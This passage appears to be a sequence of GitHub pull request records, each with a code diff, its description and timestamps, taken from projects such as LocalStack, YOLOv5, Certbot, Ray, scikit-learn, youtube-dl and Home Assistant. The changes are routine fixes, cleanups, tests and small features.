var_name not in env_vars: - env_vars[var_name] = os.environ[var_name] if aws_stack.is_local_env(env): - # need to disable CBOR protocol, enforce use of plain JSON, - # see https://github.com/mhart/kinesalite/issues/31 + # disable CBOR protocol, enforce use of plain JSON env_vars["AWS_CBOR_DISABLE"] = "true" if kcl_log_level or (len(log_subscribers) > 0): if not log_file: @@ -390,7 +372,6 @@ def start_kcl_client_process( executableName=listener_script, streamName=stream_name, applicationName=stream_info["app_name"], - credentialsProvider=credentialsProvider, region_name=region_name, **kwargs, )
Clean up deprecated Java libs for STS integration with Kinesis client. 🧹 This code dates back to the very early days, when parts of the Kinesis client utils were used to connect to Kinesis streams in real AWS (using IAM/STS tokens). This is no longer required today, and should be removed. We have recently also seen some users running into issues with the Java compilation in local dev mode - removing it should hopefully simplify the installation a bit further.
https://api.github.com/repos/localstack/localstack/pulls/6856
2022-09-12T09:41:48Z
2022-09-12T15:14:00Z
2022-09-12T15:14:00Z
2022-09-12T15:14:02Z
2,075
localstack/localstack
29,230
Adding a file for listing relevant research papers
diff --git a/docs/research/README.md b/docs/research/README.md new file mode 100644 index 0000000000..498a858b2a --- /dev/null +++ b/docs/research/README.md @@ -0,0 +1,23 @@ +# Research + +This page lists research papers that are relevant to the project. + +## Automatically Generating Instruction Data for Training + +This line of work is about significantly reducing the need for manually annotated data for the purpose of training [instruction-aligned](https://openai.com/blog/instruction-following/) language models. + +### SELF-INSTRUCT: Aligning Language Model with Self Generated Instructions [[ArXiv](https://arxiv.org/pdf/2212.10560.pdf)], [[Github](https://github.com/yizhongw/self-instruct)]. + +> We introduce SELF-INSTRUCT, a framework for improving the instruction-following capabilities of pretrained language models by bootstrapping off its own generations. +> Our pipeline generates instruction, input, and output samples from a language model, then prunes them before using them to finetune the original model. +> Applying our method to vanilla GPT3, we demonstrate a 33% absolute improvement over the original model on SuperNaturalInstructions, on par with the performance of InstructGPT-0011, which is trained with private user data and human annotations. + +### Tuning Language Models with (Almost) No Human Labor. [[ArXiv](https://arxiv.org/pdf/2212.09689.pdf)], [[Github](https://github.com/orhonovich/unnatural-instructions)]. + +> In this work, we introduce +> Unnatural Instructions: a large dataset of creative and diverse instructions, collected with virtually no human labor. +> We collect 64,000 examples by prompting a language model with three seed examples of instructions and eliciting a fourth. +> This set is then expanded by prompting the model to rephrase each instruction, creating a total of approximately 240,000 examples of instructions, inputs, and outputs. +> Experiments show that despite containing a fair amount of noise, training on Unnatural Instructions rivals the effectiveness of training +> on open-source manually-curated datasets, surpassing the performance of models such as +> T0++ and Tk-Instruct across various benchmarks.
Specifically, adding methods for automatically generating instruction training data.
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/217
2022-12-31T21:45:12Z
2023-01-01T16:47:39Z
2023-01-01T16:47:39Z
2023-01-01T16:47:39Z
497
LAION-AI/Open-Assistant
37,435
Autosplit
diff --git a/utils/datasets.py b/utils/datasets.py index 7466ba48b27..eb355e913b8 100755 --- a/utils/datasets.py +++ b/utils/datasets.py @@ -902,3 +902,20 @@ def flatten_recursive(path='../coco128'): create_folder(new_path) for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)): shutil.copyfile(file, new_path / Path(file).name) + + +def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit() + """ Autosplit a dataset into train/val/test splits and save *.txt files + # Arguments + path: Path to images directory + weights: Train, val, test weights (list) + """ + path = Path(path) # images dir + files = list(path.rglob('*.*')) + indices = random.choices([0, 1, 2], weights=weights, k=len(files)) # assign each image to a split + txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files + [(path / x).unlink() for x in txt if (path / x).exists()] # remove existing + for i, img in tqdm(zip(indices, files)): + if img.suffix[1:] in img_formats: + with open(path / txt[i], 'a') as f: + f.write(str(img) + '\n') # add image to txt file
This PR implements an Autosplit function addition. This new function automatically splits a dataset into train/val/test splits. ## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Introducing an automatic dataset splitting function to the YOLOv5 repository. ### 📊 Key Changes - Added the `autosplit` function within `datasets.py`. - The function divides a dataset into training, validation, and test sets based on specified weights. - It generates three text files (`autosplit_train.txt`, `autosplit_val.txt`, `autosplit_test.txt`) to store lists of the file paths for each split. - Existing split text files are removed before creating new ones to avoid duplication. ### 🎯 Purpose & Impact - **Ease of Use:** Simplifies the process of creating train/val/test splits, making it easier for users to prepare their datasets. - **Flexibility:** Allows users to define their own split ratios through the `weights` parameter. - **Efficiency:** Automatically handles the creation and cleaning up of split files, saving time and reducing manual errors. - **Potential Impact:** Could improve overall data management practices and reproducibility of experiments for YOLOv5 users. 🚀
https://api.github.com/repos/ultralytics/yolov5/pulls/1488
2020-11-23T16:17:55Z
2020-11-23T16:18:22Z
2020-11-23T16:18:22Z
2024-01-19T20:20:46Z
368
ultralytics/yolov5
25,150
Turn off cancel notifications
diff --git a/.travis.yml b/.travis.yml index 370137f68d7..96c6fe414aa 100644 --- a/.travis.yml +++ b/.travis.yml @@ -105,6 +105,7 @@ notifications: irc: channels: - secure: "SGWZl3ownKx9xKVV2VnGt7DqkTmutJ89oJV9tjKhSs84kLijU6EYdPnllqISpfHMTxXflNZuxtGo0wTDYHXBuZL47w1O32W6nzuXdra5zC+i4sYQwYULUsyfOv9gJX8zWAULiK0Z3r0oho45U+FR5ZN6TPCidi8/eGU+EEPwaAw=" + on_cancel: never on_success: never on_failure: always use_notice: true
By default, Travis cancels builds on branches and PRs if another commit lands in favor of running tests on that. See https://blog.travis-ci.com/2017-09-21-default-auto-cancellation. I think this behavior is good as it stops us spending resources testing out of date code, but with our current setup, it causes Travis to send us notifications when builds are automatically canceled on master. This PR changes that by not sending out notifications when a build gets canceled.
https://api.github.com/repos/certbot/certbot/pulls/5918
2018-05-02T19:36:13Z
2018-05-23T20:57:22Z
2018-05-23T20:57:22Z
2018-05-23T20:57:25Z
221
certbot/certbot
3,478
Fix mypy error at maths
diff --git a/maths/greedy_coin_change.py b/maths/greedy_coin_change.py index 5a7d9e8d84ae..5233ee1cbc12 100644 --- a/maths/greedy_coin_change.py +++ b/maths/greedy_coin_change.py @@ -41,7 +41,7 @@ """ -def find_minimum_change(denominations: list[int], value: int) -> list[int]: +def find_minimum_change(denominations: list[int], value: str) -> list[int]: """ Find the minimum change from the given denominations and value >>> find_minimum_change([1, 5, 10, 20, 50, 100, 200, 500, 1000,2000], 18745) @@ -75,7 +75,7 @@ def find_minimum_change(denominations: list[int], value: int) -> list[int]: if __name__ == "__main__": denominations = list() - value = 0 + value = "0" if ( input("Do you want to enter your denominations ? (yY/n): ").strip().lower() diff --git a/maths/triplet_sum.py b/maths/triplet_sum.py index 22fab17d30c2..af77ed145bce 100644 --- a/maths/triplet_sum.py +++ b/maths/triplet_sum.py @@ -19,7 +19,7 @@ def make_dataset() -> tuple[list[int], int]: dataset = make_dataset() -def triplet_sum1(arr: list[int], target: int) -> tuple[int, int, int]: +def triplet_sum1(arr: list[int], target: int) -> tuple[int, ...]: """ Returns a triplet in the array with sum equal to target, else (0, 0, 0). diff --git a/maths/two_sum.py b/maths/two_sum.py index 5209acbc7e44..12ad332d6c4e 100644 --- a/maths/two_sum.py +++ b/maths/two_sum.py @@ -31,7 +31,7 @@ def two_sum(nums: list[int], target: int) -> list[int]: >>> two_sum([3 * i for i in range(10)], 19) [] """ - chk_map = {} + chk_map: dict[int, int] = {} for index, val in enumerate(nums): compl = target - val if compl in chk_map:
Related issue #4052 ### **Describe your change:** * [ ] Add an algorithm? * [x] Fix a bug or typo in an existing algorithm? * [ ] Documentation change? ### **Checklist:** * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [x] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation. * [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
https://api.github.com/repos/TheAlgorithms/Python/pulls/4613
2021-08-15T04:46:15Z
2021-08-15T19:15:53Z
2021-08-15T19:15:53Z
2021-08-18T11:25:15Z
562
TheAlgorithms/Python
29,923
Fix exllama tokenizers
diff --git a/modules/exllama.py b/modules/exllama.py index 177f028f3c..f3894b7a72 100644 --- a/modules/exllama.py +++ b/modules/exllama.py @@ -1,5 +1,6 @@ from pathlib import Path +import torch import torch.nn.functional as F from torch import version as torch_version @@ -111,7 +112,7 @@ def generate_with_streaming(self, prompt, state): if state['custom_token_bans']: to_ban = [int(x) for x in state['custom_token_bans'].split(',')] if len(to_ban) > 0: - self.generator.disallow_tokens(self.tokenizer, to_ban) + self.generator.disallow_tokens(to_ban) # Case 1: no CFG if state['guidance_scale'] == 1: @@ -119,6 +120,11 @@ def generate_with_streaming(self, prompt, state): # Tokenizing the input ids = self.generator.tokenizer.encode(prompt, max_seq_len=self.model.config.max_seq_len) + if state['add_bos_token']: + ids = torch.cat( + [torch.tensor([[self.tokenizer.bos_token_id]]).to(ids.device), + ids], dim=1 + ).to(torch.int64) ids = ids[:, -get_max_prompt_length(state):] if state['auto_max_new_tokens']: max_new_tokens = state['truncation_length'] - ids.shape[-1] @@ -148,7 +154,12 @@ def generate_with_streaming(self, prompt, state): alpha = state['guidance_scale'] prompts = [prompt, state['negative_prompt'] or ''] - ids, mask = self.tokenizer.encode(prompts, return_mask=True, max_seq_len=self.model.config.max_seq_len) + ids, mask = self.tokenizer.encode( + prompts, + return_mask=True, + max_seq_len=self.model.config.max_seq_len, + add_bos=state['add_bos_token'] + ) if state['auto_max_new_tokens']: max_new_tokens = state['truncation_length'] - ids[0].shape[-1] else: @@ -188,7 +199,12 @@ def generate(self, prompt, state): return output def encode(self, string, **kwargs): - return self.tokenizer.encode(string, max_seq_len=self.model.config.max_seq_len) + return self.tokenizer.encode(string, max_seq_len=self.model.config.max_seq_len, add_bos=True) - def decode(self, string, **kwargs): - return self.tokenizer.decode(string)[0] + def decode(self, ids, **kwargs): + if isinstance(ids, int): + ids = torch.tensor([[ids]]) + elif isinstance(ids, torch.Tensor) and ids.numel() == 1: + ids = ids.view(1, -1) + + return self.tokenizer.decode(ids)[0] diff --git a/modules/exllamav2.py b/modules/exllamav2.py index a325a4d376..0bfe1f7364 100644 --- a/modules/exllamav2.py +++ b/modules/exllamav2.py @@ -48,7 +48,7 @@ def from_pretrained(self, path_to_model): result.cache = cache result.tokenizer = tokenizer result.generator = generator - return result, tokenizer + return result, result def generate_with_streaming(self, prompt, state): settings = ExLlamaV2Sampler.Settings() @@ -65,7 +65,7 @@ def generate_with_streaming(self, prompt, state): if len(to_ban) > 0: settings.disallow_tokens(self.tokenizer, to_ban) - ids = self.tokenizer.encode(prompt) + ids = self.tokenizer.encode(prompt, add_bos=state['add_bos_token']) ids = ids[:, -get_max_prompt_length(state):] initial_len = ids.shape[-1] @@ -104,7 +104,12 @@ def generate(self, prompt, state): return output def encode(self, string, **kwargs): - return self.tokenizer.encode(string) + return self.tokenizer.encode(string, add_bos=True) - def decode(self, string, **kwargs): - return self.tokenizer.decode(string)[0] + def decode(self, ids, **kwargs): + if isinstance(ids, int): + ids = torch.tensor([[ids]]) + elif isinstance(ids, torch.Tensor) and ids.numel() == 1: + ids = ids.view(1, -1) + + return self.tokenizer.decode(ids)[0]
## Checklist: - [ X ] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines). Currently, with exllama, BOS is never added no matter what settings are chosen
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/3954
2023-09-16T11:23:49Z
2023-09-16T12:42:39Z
2023-09-16T12:42:39Z
2023-09-16T12:44:06Z
1,044
oobabooga/text-generation-webui
26,167
Refine RegisterClientRequest message to make it clearer.
diff --git a/src/ray/common/id.cc b/src/ray/common/id.cc index 2379a22fde1ba..0735d4d0058b6 100644 --- a/src/ray/common/id.cc +++ b/src/ray/common/id.cc @@ -85,7 +85,7 @@ uint64_t MurmurHash64A(const void *key, int len, unsigned int seed) { return h; } -TaskID TaskID::GetDriverTaskID(const WorkerID &driver_id) { +TaskID TaskID::ComputeDriverTaskId(const WorkerID &driver_id) { std::string driver_id_str = driver_id.Binary(); driver_id_str.resize(Size()); return TaskID::FromBinary(driver_id_str); diff --git a/src/ray/common/id.h b/src/ray/common/id.h index 09f4a16aa660a..667e55769e65c 100644 --- a/src/ray/common/id.h +++ b/src/ray/common/id.h @@ -72,7 +72,7 @@ class TaskID : public BaseID<TaskID> { public: TaskID() : BaseID() {} static size_t Size() { return kTaskIDSize; } - static TaskID GetDriverTaskID(const WorkerID &driver_id); + static TaskID ComputeDriverTaskId(const WorkerID &driver_id); private: uint8_t id_[kTaskIDSize]; diff --git a/src/ray/raylet/format/node_manager.fbs b/src/ray/raylet/format/node_manager.fbs index aba7ab8cf6a6e..d5f5f2c7c1d9f 100644 --- a/src/ray/raylet/format/node_manager.fbs +++ b/src/ray/raylet/format/node_manager.fbs @@ -131,12 +131,11 @@ table RegisterClientRequest { // True if the client is a worker and false if the client is a driver. is_worker: bool; // The ID of the worker or driver. - client_id: string; + worker_id: string; // The process ID of this worker. worker_pid: long; - // The driver ID. This is non-nil if the client is a driver. - // TODO(qwang): rename this to driver_task_id. - driver_id: string; + // The job ID if the client is a driver, otherwise it should be NIL. + job_id: string; // Language of this worker. language: Language; } diff --git a/src/ray/raylet/node_manager.cc b/src/ray/raylet/node_manager.cc index 8e2cdf6846c62..35da34fe5207b 100644 --- a/src/ray/raylet/node_manager.cc +++ b/src/ray/raylet/node_manager.cc @@ -844,7 +844,7 @@ void NodeManager::ProcessClientMessage( void NodeManager::ProcessRegisterClientRequestMessage( const std::shared_ptr<LocalClientConnection> &client, const uint8_t *message_data) { auto message = flatbuffers::GetRoot<protocol::RegisterClientRequest>(message_data); - client->SetClientID(from_flatbuf<ClientID>(*message->client_id())); + client->SetClientID(from_flatbuf<ClientID>(*message->worker_id())); auto worker = std::make_shared<Worker>(message->worker_pid(), message->language(), client); if (message->is_worker()) { @@ -852,15 +852,12 @@ void NodeManager::ProcessRegisterClientRequestMessage( worker_pool_.RegisterWorker(std::move(worker)); DispatchTasks(local_queues_.GetReadyTasksWithResources()); } else { - // Register the new driver. Note that here the driver_id in RegisterClientRequest - // message is actually the ID of the driver task, while client_id represents the - // real driver ID, which can associate all the tasks/actors for a given driver, - // which is set to the worker ID. - // TODO(qwang): Use driver_task_id instead here. - const WorkerID driver_id = from_flatbuf<WorkerID>(*message->driver_id()); - TaskID driver_task_id = TaskID::GetDriverTaskID(driver_id); + // Register the new driver. + const WorkerID driver_id = from_flatbuf<WorkerID>(*message->worker_id()); + // Compute a dummy driver task id from a given driver. + const TaskID driver_task_id = TaskID::ComputeDriverTaskId(driver_id); worker->AssignTaskId(driver_task_id); - worker->AssignJobId(from_flatbuf<JobID>(*message->client_id())); + worker->AssignJobId(from_flatbuf<JobID>(*message->job_id())); worker_pool_.RegisterDriver(std::move(worker)); local_queues_.AddDriverTaskId(driver_task_id); }
Refine `RegisterClientRequest` to make the handler in node_manager clearer.
https://api.github.com/repos/ray-project/ray/pulls/5057
2019-06-28T06:59:52Z
2019-07-02T06:26:20Z
2019-07-02T06:26:19Z
2019-07-05T23:33:55Z
1,066
ray-project/ray
19,494
Fix restore BaseNB._check_X without abstractmethod decoration
diff --git a/doc/whats_new/v0.22.rst b/doc/whats_new/v0.22.rst index e36d7e925529d..394fd6ee8203c 100644 --- a/doc/whats_new/v0.22.rst +++ b/doc/whats_new/v0.22.rst @@ -61,9 +61,10 @@ Changelog :mod:`sklearn.naive_bayes` .......................... -- |Fix| removed abstract method `_check_X` from :class:`naive_bayes.BaseNB` - that could break downstream projects inheriting from this deprecated - public base class. :pr:`15996` by :user:`Brigitta Sipőcz <bsipocz>`. +- |Fix| Removed `abstractmethod` decorator for the method `_check_X` in + :class:`naive_bayes.BaseNB` that could break downstream projects inheriting + from this deprecated public base class. :pr:`15996` by + :user:`Brigitta Sipőcz <bsipocz>`. :mod:`sklearn.semi_supervised` .............................. diff --git a/sklearn/naive_bayes.py b/sklearn/naive_bayes.py index d958645b178f6..22bd339cbd6b0 100644 --- a/sklearn/naive_bayes.py +++ b/sklearn/naive_bayes.py @@ -51,6 +51,14 @@ def _joint_log_likelihood(self, X): predict_proba and predict_log_proba. """ + def _check_X(self, X): + """To be overridden in subclasses with the actual checks.""" + # Note that this is not marked @abstractmethod as long as the + # deprecated public alias sklearn.naive_bayes.BayesNB exists + # (until 0.24) to preserve backward compat for 3rd party projects + # with existing derived classes. + return X + def predict(self, X): """ Perform classification on an array of test vectors X.
This is a follow-up on #15996 to fix the fact that this method is actually internally used by the other methods of the base class as remarked by @qinhanmin2014: https://github.com/scikit-learn/scikit-learn/pull/15996#issuecomment-569942569
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/15997
2019-12-31T15:29:36Z
2020-01-01T03:11:18Z
2020-01-01T03:11:18Z
2020-01-02T09:01:55Z
476
scikit-learn/scikit-learn
46,605
Fix encoding of non-ASCII results from API Gateway
diff --git a/localstack/services/apigateway/apigateway_listener.py b/localstack/services/apigateway/apigateway_listener.py index eaa057e69a99e..c53679e427003 100644 --- a/localstack/services/apigateway/apigateway_listener.py +++ b/localstack/services/apigateway/apigateway_listener.py @@ -9,7 +9,7 @@ from localstack.config import TEST_KINESIS_URL, TEST_SQS_URL from localstack.utils import common from localstack.utils.aws import aws_stack -from localstack.utils.common import to_str +from localstack.utils.common import to_str, to_bytes from localstack.utils.analytics import event_publisher from localstack.services.kinesis import kinesis_listener from localstack.services.awslambda import lambda_api @@ -230,9 +230,10 @@ def invoke_rest_api(api_id, stage, method, invocation_path, data, headers, path= if isinstance(parsed_result['body'], dict): response._content = json.dumps(parsed_result['body']) else: - response._content = parsed_result['body'] + response._content = to_bytes(parsed_result['body']) except Exception: response._content = '{}' + response.headers['Content-Length'] = len(response._content) return response else: msg = 'API Gateway action uri "%s" not yet implemented' % uri diff --git a/tests/integration/lambdas/lambda_integration.py b/tests/integration/lambdas/lambda_integration.py index a03f5b2849619..9505b00baafa2 100644 --- a/tests/integration/lambdas/lambda_integration.py +++ b/tests/integration/lambdas/lambda_integration.py @@ -43,10 +43,13 @@ def handler(event, context): body['requestContext'] = event.get('requestContext') body['queryStringParameters'] = event.get('queryStringParameters') body['httpMethod'] = event.get('httpMethod') + status_code = body.get('return_status_code', 200) + headers = body.get('return_headers', {}) + body = body.get('return_raw_body') or body return { 'body': body, - 'statusCode': body.get('return_status_code', 200), - 'headers': body.get('return_headers', {}) + 'statusCode': status_code, + 'headers': headers } if 'Records' not in event: diff --git a/tests/integration/test_api_gateway.py b/tests/integration/test_api_gateway.py index bb6979598defd..e3758b2c35071 100644 --- a/tests/integration/test_api_gateway.py +++ b/tests/integration/test_api_gateway.py @@ -1,3 +1,5 @@ +# -*- coding: utf-8 -*- + import base64 import re import json @@ -215,10 +217,7 @@ def _test_api_gateway_lambda_proxy_integration(self, fn_name, path): target_uri = invocation_uri % (DEFAULT_REGION, lambda_uri) result = self.connect_api_gateway_to_http_with_lambda_proxy( - 'test_gateway2', - target_uri, - path=path - ) + 'test_gateway2', target_uri, path=path) api_id = result['id'] path_map = get_rest_api_paths(api_id) @@ -229,17 +228,11 @@ def _test_api_gateway_lambda_proxy_integration(self, fn_name, path): path = path + '?foo=foo&bar=bar&bar=baz' url = INBOUND_GATEWAY_URL_PATTERN.format( - api_id=api_id, - stage_name=self.TEST_STAGE_NAME, - path=path - ) + api_id=api_id, stage_name=self.TEST_STAGE_NAME, path=path) data = {'return_status_code': 203, 'return_headers': {'foo': 'bar123'}} - result = requests.post( - url, - data=json.dumps(data), - headers={'User-Agent': 'python-requests/testing'} - ) + result = requests.post(url, data=json.dumps(data), + headers={'User-Agent': 'python-requests/testing'}) self.assertEqual(result.status_code, 203) self.assertEqual(result.headers.get('foo'), 'bar123') @@ -263,6 +256,11 @@ def _test_api_gateway_lambda_proxy_integration(self, fn_name, path): result = requests.delete(url, data=json.dumps(data)) self.assertEqual(result.status_code, 404) + # send message with non-ASCII chars + body_msg = '🙀 - 参よ' + result = requests.post(url, data=json.dumps({'return_raw_body': body_msg})) + self.assertEqual(to_str(result.content), body_msg) + def test_api_gateway_lambda_proxy_integration_any_method(self): self._test_api_gateway_lambda_proxy_integration_any_method( self.TEST_LAMBDA_PROXY_BACKEND_ANY_METHOD, @@ -281,19 +279,12 @@ def _test_api_gateway_lambda_proxy_integration_any_method(self, fn_name, path): target_uri = aws_stack.apigateway_invocations_arn(lambda_uri) result = self.connect_api_gateway_to_http_with_lambda_proxy( - 'test_gateway3', - target_uri, - methods=['ANY'], - path=path - ) + 'test_gateway3', target_uri, methods=['ANY'], path=path) # make test request to gateway and check response path = path.replace('{test_param1}', 'foo1') url = INBOUND_GATEWAY_URL_PATTERN.format( - api_id=result['id'], - stage_name=self.TEST_STAGE_NAME, - path=path - ) + api_id=result['id'], stage_name=self.TEST_STAGE_NAME, path=path) data = {} for method in ('GET', 'POST', 'PUT', 'PATCH', 'DELETE', 'OPTIONS'): @@ -379,7 +370,6 @@ def create_lambda_function(self, fn_name): libs=TEST_LAMBDA_LIBS, runtime=LAMBDA_RUNTIME_PYTHON27 ) - testutil.create_lambda_function( func_name=fn_name, zip_file=zip_file,
Fix encoding of non-ASCII results from API Gateway
https://api.github.com/repos/localstack/localstack/pulls/1715
2019-11-02T21:00:25Z
2019-11-02T22:16:27Z
2019-11-02T22:16:27Z
2019-11-02T22:16:32Z
1,341
localstack/localstack
28,555
[RTBFVideo] Add new extractor
diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py index e389acc6abe..a8fef270302 100644 --- a/youtube_dl/extractor/__init__.py +++ b/youtube_dl/extractor/__init__.py @@ -210,6 +210,7 @@ from .ro220 import Ro220IE from .rottentomatoes import RottenTomatoesIE from .roxwel import RoxwelIE +from .rtbf import RTBFVideoIE from .rtlnow import RTLnowIE from .rts import RTSIE from .rtve import RTVEALaCartaIE diff --git a/youtube_dl/extractor/rtbf.py b/youtube_dl/extractor/rtbf.py new file mode 100644 index 00000000000..54453966556 --- /dev/null +++ b/youtube_dl/extractor/rtbf.py @@ -0,0 +1,48 @@ +# coding: utf-8 +from __future__ import unicode_literals + +import re +import json + +from .common import InfoExtractor +from ..utils import clean_html + +class RTBFVideoIE(InfoExtractor): + _VALID_URL = r'https?://www.rtbf.be/video/(?P<title>[^?]+)\?.*id=(?P<id>[0-9]+)' + _TEST = { + 'url': 'https://www.rtbf.be/video/detail_les-diables-au-coeur-episode-2?id=1921274', + 'md5': '799f334ddf2c0a582ba80c44655be570', + 'info_dict': { + 'id': '1921274', + 'ext': 'mp4', + 'title': 'Les Diables au coeur (épisode 2)', + 'duration': 3099, + } + } + + def _real_extract(self, url): + mobj = re.match(self._VALID_URL, url) + video_id = mobj.group('id') + + # TODO more code goes here, for example ... + webpage = self._download_webpage(url, video_id) + title = self._html_search_regex( + r'<meta property="og:description" content="([^"]*)"', + webpage, 'title', mobj.group('title')) + + iframe_url = self._html_search_regex(r'<iframe [^>]*src="([^"]+)"', + webpage, 'iframe') + iframe = self._download_webpage(iframe_url, video_id) + + data_video_idx = iframe.find('data-video') + next_data_idx = iframe.find('data-', data_video_idx + 1) + json_data_start = data_video_idx + len('data-video=') + 1 + json_data_end = next_data_idx - 2 + video_data = json.loads(clean_html(iframe[json_data_start:json_data_end])) + + return { + 'id': video_id, + 'title': title, + 'url': video_data['data']['downloadUrl'], + 'duration': video_data['data']['duration'], + }
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/2822
2014-04-28T18:33:48Z
2014-04-29T12:43:47Z
2014-04-29T12:43:47Z
2014-04-29T12:44:25Z
718
ytdl-org/youtube-dl
50,317
[pre-commit.ci] pre-commit autoupdate
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 6dafd1980e..4531f0b4ef 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -15,7 +15,7 @@ repos: files: "^(?!examples/)" args: ["--application-directories", "src"] - repo: https://github.com/psf/black - rev: 23.1.0 + rev: 23.3.0 hooks: - id: black - repo: https://github.com/PyCQA/flake8
<!--pre-commit.ci start--> updates: - [github.com/psf/black: 23.1.0 → 23.3.0](https://github.com/psf/black/compare/23.1.0...23.3.0) <!--pre-commit.ci end-->
https://api.github.com/repos/pallets/flask/pulls/5041
2023-04-04T06:31:31Z
2023-04-04T14:00:50Z
2023-04-04T14:00:50Z
2023-04-19T00:05:29Z
146
pallets/flask
20,029
Set nest entities as unavailable on lost connection
diff --git a/homeassistant/components/nest/climate_sdm.py b/homeassistant/components/nest/climate_sdm.py index e40db60d5eddab..3113cb2dd40201 100644 --- a/homeassistant/components/nest/climate_sdm.py +++ b/homeassistant/components/nest/climate_sdm.py @@ -117,6 +117,11 @@ def device_info(self) -> DeviceInfo: """Return device specific attributes.""" return self._device_info.device_info + @property + def available(self) -> bool: + """Return device availability.""" + return self._device_info.available + async def async_added_to_hass(self) -> None: """Run when entity is added to register update signal handler.""" self._attr_supported_features = self._get_supported_features() diff --git a/homeassistant/components/nest/const.py b/homeassistant/components/nest/const.py index 64c27c1643be78..853e778977d35a 100644 --- a/homeassistant/components/nest/const.py +++ b/homeassistant/components/nest/const.py @@ -14,6 +14,8 @@ CONF_SUBSCRIBER_ID_IMPORTED = "subscriber_id_imported" CONF_CLOUD_PROJECT_ID = "cloud_project_id" +CONNECTIVITY_TRAIT_OFFLINE = "OFFLINE" + SIGNAL_NEST_UPDATE = "nest_update" # For the Google Nest Device Access API diff --git a/homeassistant/components/nest/device_info.py b/homeassistant/components/nest/device_info.py index 2d2b01d3849255..e269b76fcc4be5 100644 --- a/homeassistant/components/nest/device_info.py +++ b/homeassistant/components/nest/device_info.py @@ -5,13 +5,13 @@ from collections.abc import Mapping from google_nest_sdm.device import Device -from google_nest_sdm.device_traits import InfoTrait +from google_nest_sdm.device_traits import ConnectivityTrait, InfoTrait from homeassistant.core import HomeAssistant, callback from homeassistant.helpers import device_registry as dr from homeassistant.helpers.entity import DeviceInfo -from .const import DATA_DEVICE_MANAGER, DOMAIN +from .const import CONNECTIVITY_TRAIT_OFFLINE, DATA_DEVICE_MANAGER, DOMAIN DEVICE_TYPE_MAP: dict[str, str] = { "sdm.devices.types.CAMERA": "Camera", @@ -30,6 +30,15 @@ def __init__(self, device: Device) -> None: """Initialize the DeviceInfo.""" self._device = device + @property + def available(self) -> bool: + """Return device availability.""" + if ConnectivityTrait.NAME in self._device.traits: + trait: ConnectivityTrait = self._device.traits[ConnectivityTrait.NAME] + if trait.status == CONNECTIVITY_TRAIT_OFFLINE: + return False + return True + @property def device_info(self) -> DeviceInfo: """Return device specific attributes.""" diff --git a/homeassistant/components/nest/sensor_sdm.py b/homeassistant/components/nest/sensor_sdm.py index 11edc9f3506fc3..b36e91031960ff 100644 --- a/homeassistant/components/nest/sensor_sdm.py +++ b/homeassistant/components/nest/sensor_sdm.py @@ -62,6 +62,11 @@ def __init__(self, device: Device) -> None: self._attr_unique_id = f"{device.name}-{self.device_class}" self._attr_device_info = self._device_info.device_info + @property + def available(self) -> bool: + """Return the device availability.""" + return self._device_info.available + async def async_added_to_hass(self) -> None: """Run when entity is added to register update signal handler.""" self.async_on_remove( diff --git a/tests/components/nest/test_climate_sdm.py b/tests/components/nest/test_climate_sdm.py index 440855f6ab7782..4ac58171fcdcd7 100644 --- a/tests/components/nest/test_climate_sdm.py +++ b/tests/components/nest/test_climate_sdm.py @@ -34,7 +34,11 @@ HVACAction, HVACMode, ) -from homeassistant.const import ATTR_SUPPORTED_FEATURES, ATTR_TEMPERATURE +from homeassistant.const import ( + ATTR_SUPPORTED_FEATURES, + ATTR_TEMPERATURE, + STATE_UNAVAILABLE, +) from homeassistant.core import HomeAssistant from homeassistant.exceptions import HomeAssistantError @@ -1442,3 +1446,63 @@ async def test_thermostat_hvac_mode_failure( with pytest.raises(HomeAssistantError): await common.async_set_preset_mode(hass, PRESET_ECO) await hass.async_block_till_done() + + +async def test_thermostat_available( + hass: HomeAssistant, setup_platform: PlatformSetup, create_device: CreateDevice +): + """Test a thermostat that is available.""" + create_device.create( + { + "sdm.devices.traits.ThermostatHvac": { + "status": "COOLING", + }, + "sdm.devices.traits.ThermostatMode": { + "availableModes": ["HEAT", "COOL", "HEATCOOL", "OFF"], + "mode": "COOL", + }, + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 29.9, + }, + "sdm.devices.traits.ThermostatTemperatureSetpoint": { + "coolCelsius": 28.0, + }, + "sdm.devices.traits.Connectivity": {"status": "ONLINE"}, + }, + ) + await setup_platform() + + assert len(hass.states.async_all()) == 1 + thermostat = hass.states.get("climate.my_thermostat") + assert thermostat is not None + assert thermostat.state == HVACMode.COOL + + +async def test_thermostat_unavailable( + hass: HomeAssistant, setup_platform: PlatformSetup, create_device: CreateDevice +): + """Test a thermostat that is unavailable.""" + create_device.create( + { + "sdm.devices.traits.ThermostatHvac": { + "status": "COOLING", + }, + "sdm.devices.traits.ThermostatMode": { + "availableModes": ["HEAT", "COOL", "HEATCOOL", "OFF"], + "mode": "COOL", + }, + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 29.9, + }, + 